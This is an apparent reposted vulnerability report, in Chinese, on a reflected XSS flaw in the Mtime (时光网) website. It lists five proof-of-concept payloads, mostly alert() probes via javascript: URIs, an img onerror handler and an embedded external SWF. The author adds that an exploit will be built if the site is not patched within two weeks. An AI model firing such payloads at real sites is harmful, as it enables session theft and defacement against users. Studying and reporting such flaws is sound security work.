鸿 网 互 联 www.68idc.cn

当前位置 : 服务器租用 > 网站安全 > 安全设置 > >

时光网一处XSS 5种打法

来源:互联网 作者:佚名 时间:2015-07-07 06:42
漏洞的危害其实是因需求而异,对于一次精心的渗透而言或许一个反射xss就够了.没被干过的厂商也不懂那份痛了. 1.jpg poc1:INPUT SRC=javascript:alert(XSS); poc2:img src=# onerror=alert(XSS) poc3: IFRAME SRC=javascript:alert(XSS);/IFRAME poc4: EMB
漏洞的危害其实是因需求而异,对于一次精心的渗透而言或许一个反射xss就够了.没被干过的厂商也不懂那份痛了.
 
1.jpg
 
 
poc1:<INPUT SRC="javascript:alert('XSS');">
 
poc2:<img src='#' onerror='alert("XSS")'>
 
poc3: <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
 
poc4: <EMBED SRC="http://wooyun.org/xss.swf" ></EMBED>
 
poc5: <A href=http://www.google.com/>link</A>
 
 
 
等2周看看,没补再构造利用. 
 

 
修复方案:

攻城师懂
 
网友评论
<